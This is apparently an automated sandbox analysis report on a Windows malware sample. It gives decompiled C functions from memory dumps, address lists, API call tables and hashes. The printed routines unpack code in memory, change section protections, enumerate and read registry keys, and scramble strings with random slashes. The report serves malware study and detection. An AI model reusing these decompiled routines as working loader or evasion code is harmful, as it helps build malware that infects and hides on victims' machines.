0x03c42cfd
0x03c42cfd
0x03c42d03
0x03c42d09
0x03c42d09
0x03c42cc1
0x03c42cc7
0x03c42cca
0x03c42cd9
0x03c42cdb
0x03c42ce2
0x03c42d16
0x03c42d1b
0x03c42d1d
0x03c42d1f
0x03c42d1f
0x00000000
0x03c42d1d
0x03c42ce4
0x03c42ce9
0x03c42cf7
0x00000000
0x03c42cf7
0x03c42cb1
0x03c42cb6
0x03c42cb6
0x00000000
0x03c42cb6
0x03c42c84
0x00000000
0x00000000
0x03c42c93
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,00000800,74E5F710), ref: 03C42C7C

Part of subcall function 03C45450: GetTickCount.KERNEL32 ref: 03C45464
Part of subcall function 03C45450: wsprintfA.USER32 ref: 03C454B4
Part of subcall function 03C45450: wsprintfA.USER32 ref: 03C454D1
Part of subcall function 03C45450: wsprintfA.USER32 ref: 03C454FD
Part of subcall function 03C45450: HeapFree.KERNEL32(00000000,?), ref: 03C4550F
Part of subcall function 03C45450: wsprintfA.USER32 ref: 03C45530
Part of subcall function 03C45450: HeapFree.KERNEL32(00000000,?), ref: 03C45540
Part of subcall function 03C45450: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 03C4556E
Part of subcall function 03C45450: GetTickCount.KERNEL32 ref: 03C4557F

RtlAllocateHeap.NTDLL(00000000,00000800,74E5F710), ref: 03C42C9A
HeapFree.KERNEL32(00000000,00000002,03C47D16,?,03C47D16,00000002,?,?,03C4312C,?), ref: 03C42CF7

Strings

Ut, xrefs: 03C42CF7

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$wsprintf$AllocateFree$CountTick
String ID: Ut
API String ID: 1676223858-8415677
Opcode ID: 9b5076a5faa98add86af494e54379c8ea0106e04959e38ab7a6d2d185460f144
Instruction ID: 6a5ad321568dab2380200176184b2b67811b6e3b4e291ecb6cdf3e287887221f
Opcode Fuzzy Hash: 9b5076a5faa98add86af494e54379c8ea0106e04959e38ab7a6d2d185460f144
Instruction Fuzzy Hash: 70219F79201204ABDB21EF59E885F9A7BBCFB48305F008426F902DB251DB71EE00DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00401BAE, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00401BAE(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t43;
				long _t54;
				signed int _t57;
				void* _t58;
				signed int _t60;

				_v12 = _v12 & 0x00000000;
				_t57 =  *0x403100;
				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x69b25f40,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t60 = _v12;
					if(_t60 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t54 = _t57 - 0x69b25f40;
							L9:
							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
							if(_t43 == 0) {
								_v12 = GetLastError();
							}
							_v8 = _v8 + 1;
							_t58 = _t58 + 0x7c211d88 + _t57 * 0x28;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t54 = _t57 - 0x69b25f42;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						_t54 = _t57 - 0x69b25f24;
					} else {
						_t54 = _t57 - 0x69b25f04;
					}
					goto L9;
				}
				goto L12;
			}

0x00401bb8
0x00401bc5
0x00401bcb
0x00401bd7
0x00401be7
0x00401be9
0x00401bf1
0x00401c86
0x00401c8d
0x00000000
0x00000000
0x00000000
0x00401bf7
0x00401bf7
0x00401bf7
0x00401bfb
0x00000000
0x00000000
0x00401c07
0x00401c0b
0x00401c2f
0x00401c33
0x00401c47
0x00401c47
0x00401c4d
0x00401c5c
0x00401c60
0x00401c68
0x00401c68
0x00401c70
0x00401c73
0x00401c80
0x00000000
0x00000000
0x00000000
0x00000000
0x00401c80
0x00401c3b
0x00401c3f
0x00401c45
0x00000000
0x00000000
0x00000000
0x00401c45
0x00401c13
0x00401c17
0x00401c21
0x00401c19
0x00401c19
0x00401c19
0x00000000
0x00401c17
0x00000000

APIs

VirtualProtect.KERNEL32(00000000,?,?,?,?,?,00000000,?,?), ref: 00401BE7
VirtualProtect.KERNEL32(00000000,?,?,?), ref: 00401C5C
GetLastError.KERNEL32 ref: 00401C62

Strings

`gt, xrefs: 00401BBD

Memory Dump Source

Source File: 00000000.00000002.509572364.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.509624717.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.509656267.0000000000406000.00000040.00020000.sdmp Download File

Similarity

API ID: ProtectVirtual$ErrorLast
String ID: `gt
API String ID: 1469625949-3560540215
Opcode ID: e200ab23c86fef14a09755118c0811a6a082a578495e72e8b41036a9ef0c01c2
Instruction ID: b2c716a2ba88aaf16e81d6a071de259e4f48580833c7ea43561533825924546f
Opcode Fuzzy Hash: e200ab23c86fef14a09755118c0811a6a082a578495e72e8b41036a9ef0c01c2
Instruction Fuzzy Hash: EB215C7180420ADFDB18DF95C985ABAF7F4FB18345F01446AD602E7168E3B8EA64CB58

Uniqueness

Uniqueness Score: -1.00%

Function 03C48A19, Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(80000002), ref: 03C48A76
SysAllocString.OLEAUT32(03C44BD8), ref: 03C48ABA
SysFreeString.OLEAUT32(00000000), ref: 03C48ACE
SysFreeString.OLEAUT32(00000000), ref: 03C48ADC

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 6ccf171757ec2c6fd5514c6a1205a690135a74b66d4b983617c53092efa132b2
Instruction ID: 830e1491f2c74099e1d70bdc3710d80dc4261a204225d08c226e3143c1152bf4
Opcode Fuzzy Hash: 6ccf171757ec2c6fd5514c6a1205a690135a74b66d4b983617c53092efa132b2
Instruction Fuzzy Hash: 7C310FB5900209EFCB05DF98D8C49AEBBB9FF48300B25846EF906DB251E7719A41CF61

Uniqueness

Uniqueness Score: -1.00%

Function 03C45BC0, Relevance: 6.1, APIs: 4, Instructions: 98
registrysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E03C45BC0(void* __ecx, intOrPtr _a4) {
				int* _v8;
				int _v12;
				int* _v16;
				int _v20;
				int* _v24;
				char* _v28;
				void* _v32;
				long _t33;
				char* _t35;
				long _t39;
				long _t42;
				intOrPtr _t47;
				void* _t51;
				long _t53;

				_t51 = __ecx;
				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				_v24 = 0;
				_t33 = RegOpenKeyExA(0x80000003, 0, 0, 0x20019,  &_v32); // executed
				_t53 = _t33;
				if(_t53 != 0) {
					L18:
					return _t53;
				}
				_t53 = 8;
				_t35 = E03C41525(0x104);
				_v28 = _t35;
				if(_t35 == 0) {
					L17:
					RegCloseKey(_v32);
					goto L18;
				}
				_v20 = 0x104;
				do {
					_v16 = _v20;
					_v12 = 0x104;
					_t39 = RegEnumKeyExA(_v32, _v8, _v28,  &_v12, 0, 0, 0, 0); // executed
					_t53 = _t39;
					if(_t53 != 0xea) {
						if(_t53 != 0) {
							L14:
							if(_t53 == 0x103) {
								_t53 = 0;
							}
							L16:
							E03C48B22(_v28);
							goto L17;
						}
						_t42 = E03C44B2A(_t51, _v32, _v28, _v24, _v12,  &_v8, _a4); // executed
						_t53 = _t42;
						if(_t53 != 0) {
							goto L14;
						}
						goto L12;
					}
					if(_v12 <= 0x104) {
						if(_v16 <= _v20) {
							goto L16;
						}
						E03C48B22(_v24);
						_v20 = _v16;
						_t47 = E03C41525(_v16);
						_v24 = _t47;
						if(_t47 != 0) {
							L6:
							_t53 = 0;
							goto L12;
						}
						_t53 = 8;
						goto L16;
					}
					_v8 = _v8 + 1;
					goto L6;
					L12:
				} while (WaitForSingleObject( *0x3c4d26c, 0) == 0x102);
				goto L16;
			}

0x03c45bc0
0x03c45bda
0x03c45bdd
0x03c45be0
0x03c45be3
0x03c45be6
0x03c45bec
0x03c45bf0
0x03c45cca
0x03c45cce
0x03c45cce
0x03c45bf9
0x03c45c00
0x03c45c05
0x03c45c0a
0x03c45cbf
0x03c45cc2
0x00000000
0x03c45cc8
0x03c45c10
0x03c45c13
0x03c45c1a
0x03c45c24
0x03c45c2d
0x03c45c33
0x03c45c3b
0x03c45c73
0x03c45cad
0x03c45cb3
0x03c45cb5
0x03c45cb5
0x03c45cb7
0x03c45cba
0x00000000
0x03c45cba
0x03c45c88
0x03c45c8d
0x03c45c91
0x00000000
0x00000000
0x00000000
0x03c45c91
0x03c45c40
0x03c45c4f
0x00000000
0x00000000
0x03c45c54
0x03c45c5d
0x03c45c60
0x03c45c65
0x03c45c6a
0x03c45c45
0x03c45c45
0x00000000
0x03c45c45
0x03c45c6e
0x00000000
0x03c45c6e
0x03c45c42
0x00000000
0x03c45c93
0x03c45ca0
0x00000000

APIs

RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,03C49900,?), ref: 03C45BE6

Part of subcall function 03C41525: RtlAllocateHeap.NTDLL(00000000,00000000,03C41278), ref: 03C41531

RegEnumKeyExA.KERNEL32(?,?,?,03C49900,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,03C49900), ref: 03C45C2D
WaitForSingleObject.KERNEL32(00000000,?,?,?,03C49900,?,03C49900,?,?,?,?,?,03C49900,?), ref: 03C45C9A
RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,03C49900,?,?,?,?,03C47D37,?,00000001), ref: 03C45CC2

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateCloseEnumHeapObjectOpenSingleWait
String ID:
API String ID: 3664505660-0
Opcode ID: bf236ba6b23cf97a5343b07542f3475194868b88383a75134e2cbf57753a60bb
Instruction ID: 39fe81e961e12b3c86771e97a68c60905c07f78863eea0a5b97f9cfd606b0fc7
Opcode Fuzzy Hash: bf236ba6b23cf97a5343b07542f3475194868b88383a75134e2cbf57753a60bb
Instruction Fuzzy Hash: AF315A76D00219BFCF21EFA5DC489EEFFB9EB49310F148466E951F6210D3714A449B90

Uniqueness

Uniqueness Score: -1.00%

Function 004014AD, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E004014AD(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				unsigned int _v16;
				intOrPtr _v20;
				char _v24;
				void* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _v40;
				signed int _v48;
				signed int _v52;
				intOrPtr _t46;
				void* _t53;
				intOrPtr _t54;
				intOrPtr _t57;
				signed int _t66;
				intOrPtr _t68;
				intOrPtr _t83;
				void* _t84;

				_t83 =  *0x4030f0;
				_t46 = E00401B54(_t83,  &_v24,  &_v16);
				_v20 = _t46;
				if(_t46 == 0) {
					asm("sbb ebx, ebx");
					_t66 =  ~( ~(_v16 & 0x00000fff)) + (_v16 >> 0xc);
					_t84 = _t83 + _v24;
					_v40 = _t84;
					_t53 = VirtualAlloc(0, _t66 << 0xc, 0x3000, 4); // executed
					_v28 = _t53;
					if(_t53 == 0) {
						_v20 = 8;
					} else {
						_v8 = _v8 & 0x00000000;
						if(_t66 <= 0) {
							_t54 =  *0x403100;
						} else {
							_t68 = _a4;
							_t57 = _t53 - _t84;
							_t13 = _t68 + 0x4041a7; // 0x4041a7
							_v32 = _t57;
							_v36 = _t57 + _t13;
							_v12 = _t84;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								E00401B1C(_v12 + _t57, _v12, (_v52 ^ _v48) - _v8 + _v24 + _a4 - 1, 0x400);
								_v12 = _v12 + 0x1000;
								_t54 =  *((intOrPtr*)(_v36 + 0xc)) -  *((intOrPtr*)(_v36 + 8)) +  *((intOrPtr*)(_v36 + 4));
								_v8 = _v8 + 1;
								 *0x403100 = _t54;
								if(_v8 >= _t66) {
									break;
								}
								_t57 = _v32;
							}
						}
						if(_t54 != 0x69b25f44) {
							_v20 = 9;
						} else {
							memcpy(_v40, _v28, _v16);
						}
						VirtualFree(_v28, 0, 0x8000); // executed
					}
				}
				return _v20;
			}

0x004014b4
0x004014c4
0x004014c9
0x004014ce
0x004014e3
0x004014ea
0x004014ef
0x00401500
0x00401503
0x00401509
0x0040150e
0x004015c1
0x00401514
0x00401514
0x0040151a
0x00401589
0x0040151c
0x0040151c
0x0040151f
0x00401521
0x00401529
0x0040152c
0x0040152f
0x00401537
0x00401542
0x00401543
0x00401544
0x00401561
0x0040156f
0x00401576
0x00401579
0x0040157c
0x00401584
0x00000000
0x00000000
0x00401534
0x00401534
0x00401586
0x00401593
0x004015a8
0x00401595
0x0040159e
0x004015a3
0x004015b9
0x004015b9
0x004015c8
0x004015ce

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,00000000,00000000,?,00000000,?,?,?,?,?,?,00401A1F,00000000), ref: 00401503
memcpy.NTDLL(?,00401A1F,?,?,?,?,?,?,?,00401A1F,00000000,00000030,?,00000000), ref: 0040159E
VirtualFree.KERNELBASE(00401A1F,00000000,00008000,?,?,?,?,?,?,00401A1F,00000000), ref: 004015B9

Strings

Sep 21 2021, xrefs: 0040153A

Memory Dump Source

Source File: 00000000.00000002.509572364.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.509624717.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.509656267.0000000000406000.00000040.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFreememcpy
String ID: Sep 21 2021
API String ID: 4010158826-1195158264
Opcode ID: b7dea1d35fbcc01febc5ee39c7371c435db85bd8d238cfeac80864c67dbb79ad
Instruction ID: fec1488cb982f4c8a1e82a672e9de5c8239e5989683b6aa0ff19b00d826874a3
Opcode Fuzzy Hash: b7dea1d35fbcc01febc5ee39c7371c435db85bd8d238cfeac80864c67dbb79ad
Instruction Fuzzy Hash: 2C311071D00219EFDB01DF94DD85BEEB7B8BF48304F10416AE905BB291D775AA05CB98

Uniqueness

Uniqueness Score: -1.00%

Function 03C49870, Relevance: 6.1, APIs: 4, Instructions: 87
sleepCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E03C49870(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t20;
				void* _t26;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t20 = E03C42931(__ecx,  &_v32); // executed
				_t38 = _t20;
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t16 =  &(_t39[1]); // 0x5
						_t23 = _t16;
						if( *_t16 != 0) {
							E03C48DAB(_t23);
						}
					}
					return _t38;
				}
				_t26 = E03C4155A(0x40,  &_v16); // executed
				if(_t26 != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x3c4d2ac, 1, 0,  *0x3c4d344);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8); // executed
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E03C45BC0(_t36); // executed
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E03C44B2A(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E03C44FF0(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E03C46150( &_v32, _t39);
					goto L13;
				}
			}

0x03c49870
0x03c4987d
0x03c49883
0x03c49884
0x03c49885
0x03c49886
0x03c49887
0x03c4988b
0x03c49892
0x03c49897
0x03c4989b
0x03c49923
0x03c49923
0x03c49926
0x03c49928
0x03c49930
0x03c49930
0x03c49936
0x03c49939
0x03c49939
0x03c49936
0x03c49944
0x03c49944
0x03c498a7
0x03c498ae
0x03c498b0
0x03c498b0
0x03c498c7
0x03c498cb
0x03c498ce
0x03c498d9
0x03c498e0
0x03c498e0
0x03c498e9
0x03c498ed
0x03c498fb
0x03c498ef
0x03c498ef
0x03c498f0
0x03c498f1
0x03c498f2
0x03c498f3
0x03c498f4
0x03c498f4
0x03c49900
0x03c49903
0x03c49907
0x03c49909
0x03c49909
0x03c49910
0x00000000
0x03c49912
0x03c49912
0x03c4991f
0x00000000
0x03c4991f

APIs

CreateEventA.KERNEL32(03C4D2AC,00000001,00000000,00000040,00000001,?,74E5F710,00000000,74E5F730,?,?,?,03C47D37,?,00000001,?), ref: 03C498C1
SetEvent.KERNEL32(00000000,?,?,?,03C47D37,?,00000001,?,00000002,?,?,03C4312C,?), ref: 03C498CE
Sleep.KERNEL32(00000BB8,?,?,?,03C47D37,?,00000001,?,00000002,?,?,03C4312C,?), ref: 03C498D9
CloseHandle.KERNEL32(00000000,?,?,?,03C47D37,?,00000001,?,00000002,?,?,03C4312C,?), ref: 03C498E0

Part of subcall function 03C45BC0: RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,03C49900,?), ref: 03C45BE6
Part of subcall function 03C45BC0: RegEnumKeyExA.KERNEL32(?,?,?,03C49900,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,03C49900), ref: 03C45C2D
Part of subcall function 03C45BC0: WaitForSingleObject.KERNEL32(00000000,?,?,?,03C49900,?,03C49900,?,?,?,?,?,03C49900,?), ref: 03C45C9A
Part of subcall function 03C45BC0: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,03C49900,?,?,?,?,03C47D37,?,00000001), ref: 03C45CC2

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseEvent$CreateEnumHandleObjectOpenSingleSleepWait
String ID:
API String ID: 891522397-0
Opcode ID: ddfd9ea40e6da64f3523f837e66e589bee787028d83e4a8c8ec53d663ad23f3c
Instruction ID: 5394d180e7fb1df4cd1a76a7928e6a703ccf31fab1a86db2ddcc2dce43fc27ca
Opcode Fuzzy Hash: ddfd9ea40e6da64f3523f837e66e589bee787028d83e4a8c8ec53d663ad23f3c
Instruction Fuzzy Hash: D321A777D00229AFCB20FFE58884ADFB7BCAF48210F094425EA55EB104D774DA458791

Uniqueness

Uniqueness Score: -1.00%

Function 03C47DDD, Relevance: 6.1, APIs: 4, Instructions: 80
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E03C47DDD(int _a4, int _a8, void* _a12, short* _a16, char** _a20, intOrPtr* _a24) {
				long _t26;
				intOrPtr* _t38;
				char* _t42;
				long _t43;

				if(_a4 == 0) {
					L2:
					_t26 = RegOpenKeyW(_a8, _a12,  &_a12); // executed
					_t43 = _t26;
					if(_t43 == 0) {
						RegQueryValueExW(_a12, _a16, 0,  &_a8, 0,  &_a4); // executed
						if(_a4 == 0) {
							_t43 = 0xe8;
						} else {
							_t42 = E03C41525(_a4);
							if(_t42 == 0) {
								_t43 = 8;
							} else {
								_t43 = RegQueryValueExW(_a12, _a16, 0,  &_a8, _t42,  &_a4);
								if(_t43 != 0) {
									E03C48B22(_t42);
								} else {
									 *_a20 = _t42;
									_t38 = _a24;
									if(_t38 != 0) {
										 *_t38 = _a4;
									}
								}
							}
						}
						RegCloseKey(_a12);
					}
					L12:
					return _t43;
				}
				_t43 = E03C44614(_a4, _a8, _a12, _a16, _a20, _a24);
				if(_t43 == 0) {
					goto L12;
				}
				goto L2;
			}

0x03c47de9
0x03c47e0c
0x03c47e16
0x03c47e1c
0x03c47e20
0x03c47e38
0x03c47e3d
0x03c47e85
0x03c47e3f
0x03c47e47
0x03c47e4b
0x03c47e82
0x03c47e4d
0x03c47e5f
0x03c47e63
0x03c47e79
0x03c47e65
0x03c47e68
0x03c47e6a
0x03c47e6f
0x03c47e74
0x03c47e74
0x03c47e6f
0x03c47e63
0x03c47e4b
0x03c47e8d
0x03c47e8d
0x03c47e94
0x03c47e9a
0x03c47e9a
0x03c47e02
0x03c47e06
0x00000000
0x00000000
0x00000000

APIs

RegOpenKeyW.ADVAPI32(80000002,048F9D3A,048F9D3A), ref: 03C47E16
RegQueryValueExW.KERNEL32(048F9D3A,?,00000000,80000002,00000000,00000000,?,03C44C09,3D03C4C0,80000002,03C49900,00000000,03C49900,?,048F9D3A,80000002), ref: 03C47E38
RegQueryValueExW.ADVAPI32(048F9D3A,?,00000000,80000002,00000000,00000000,00000000,?,03C44C09,3D03C4C0,80000002,03C49900,00000000,03C49900,?,048F9D3A), ref: 03C47E5D
RegCloseKey.ADVAPI32(048F9D3A,?,03C44C09,3D03C4C0,80000002,03C49900,00000000,03C49900,?,048F9D3A,80000002,00000000,?), ref: 03C47E8D

Part of subcall function 03C44614: SafeArrayDestroy.OLEAUT32(00000000), ref: 03C4469C

Part of subcall function 03C48B22: RtlFreeHeap.NTDLL(00000000,00000000,03C4131A,00000000,?,?,00000000), ref: 03C48B2E

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: QueryValue$ArrayCloseDestroyFreeHeapOpenSafe
String ID:
API String ID: 486277218-0
Opcode ID: f23688a2df873286a1c22dbea59730da70c10fcfc8821d9a1c11420f05d14abd
Instruction ID: a483dd3f21c841a388ec4c08dc365cbad1ea72b36da309f6a08153bc7647557b
Opcode Fuzzy Hash: f23688a2df873286a1c22dbea59730da70c10fcfc8821d9a1c11420f05d14abd
Instruction Fuzzy Hash: FC21EC77500159BFDF11EF94DC848EE7BA9FF08250B058525FE25DB120D7329E61ABA0

Uniqueness

Uniqueness Score: -1.00%

Function 03C4A41C, Relevance: 6.1, APIs: 4, Instructions: 61
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E03C4A41C(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				void* _t19;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t19 = RtlAllocateHeap( *0x3c4d238, 0, (__eax >> 3) + __eax + 1); // executed
				_t30 = _t19;
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x3c4d250; // 0x5f751807
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x3c4d250 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

0x03c4a424
0x03c4a427
0x03c4a42d
0x03c4a43f
0x03c4a445
0x03c4a447
0x03c4a44c
0x03c4a44e
0x03c4a451
0x03c4a453
0x03c4a456
0x03c4a458
0x03c4a458
0x03c4a45a
0x03c4a465
0x03c4a46a
0x03c4a47b
0x03c4a483
0x03c4a488
0x03c4a48b
0x03c4a48e
0x03c4a490
0x03c4a493
0x03c4a496
0x03c4a496
0x03c4a499
0x03c4a4a4
0x03c4a4a9
0x03c4a4b3

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,03C47C20,00000000,?,?,03C49DA0,?,048F95B0), ref: 03C4A427
RtlAllocateHeap.NTDLL(00000000,?), ref: 03C4A43F
memcpy.NTDLL(00000000,?,-00000008,?,?,?,03C47C20,00000000,?,?,03C49DA0,?,048F95B0), ref: 03C4A483
memcpy.NTDLL(00000001,?,00000001), ref: 03C4A4A4

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: 520810d8d2d505d46868bf19e1e4c5ffa2b58bb31c9b840aff5599855ef74194
Instruction ID: c286d7b9b015785aa641ff7602078184eff6d9967c42d319f7e3c02f141bd701
Opcode Fuzzy Hash: 520810d8d2d505d46868bf19e1e4c5ffa2b58bb31c9b840aff5599855ef74194
Instruction Fuzzy Hash: F0112976A00214BFC310DEAAEC88E9EBBBEDBC5361B090276F505DB191E7709E00C760

Uniqueness

Uniqueness Score: -1.00%

Function 03C4636D, Relevance: 4.6, APIs: 3, Instructions: 73
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E03C4636D(void* __eax, char* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, void** _a20, intOrPtr* _a24) {
				char _v5;
				signed int _v12;
				intOrPtr _v16;
				char _t28;
				void* _t33;
				void* _t38;
				void* _t45;
				char* _t46;
				void* _t48;
				char* _t56;
				char* _t57;
				intOrPtr _t59;
				void* _t60;

				_t56 = _a4;
				_t60 = __eax;
				_v12 = 0xb;
				if(_t56 != 0 && __eax != 0) {
					_t5 = _t60 - 1; // -1
					_t46 =  &(_t56[_t5]);
					_t28 =  *_t46;
					_v5 = _t28;
					 *_t46 = 0;
					__imp__(_a8, _t45);
					_v16 = _t28;
					_t57 = StrStrA(_t56, _a8);
					if(_t57 != 0) {
						 *_t46 = _v5;
						_t33 = RtlAllocateHeap( *0x3c4d238, 0, _a16 + _t60); // executed
						_t48 = _t33;
						if(_t48 == 0) {
							_v12 = 8;
						} else {
							_t58 = _t57 - _a4;
							E03C4A789(_t57 - _a4, _a4, _t48);
							_t38 = E03C4A789(_a16, _a12, _t58 + _t48);
							_t53 = _v16;
							_t59 = _a16;
							E03C4A789(_t60 - _t58 - _v16, _t53 + _t58 + _a4, _t38 + _t59);
							 *_a20 = _t48;
							_v12 = _v12 & 0x00000000;
							 *_a24 = _t60 - _v16 + _t59;
						}
					}
				}
				return _v12;
			}

0x03c46375
0x03c46378
0x03c4637a
0x03c46383
0x03c46395
0x03c46395
0x03c46399
0x03c4639b
0x03c4639e
0x03c463a1
0x03c463aa
0x03c463b4
0x03c463b8
0x03c463bd
0x03c463cd
0x03c463d3
0x03c463d7
0x03c46426
0x03c463d9
0x03c463d9
0x03c463e2
0x03c463f1
0x03c463f6
0x03c46403
0x03c4640c
0x03c46417
0x03c4641e
0x03c46422
0x03c46422
0x03c463d7
0x03c4642d
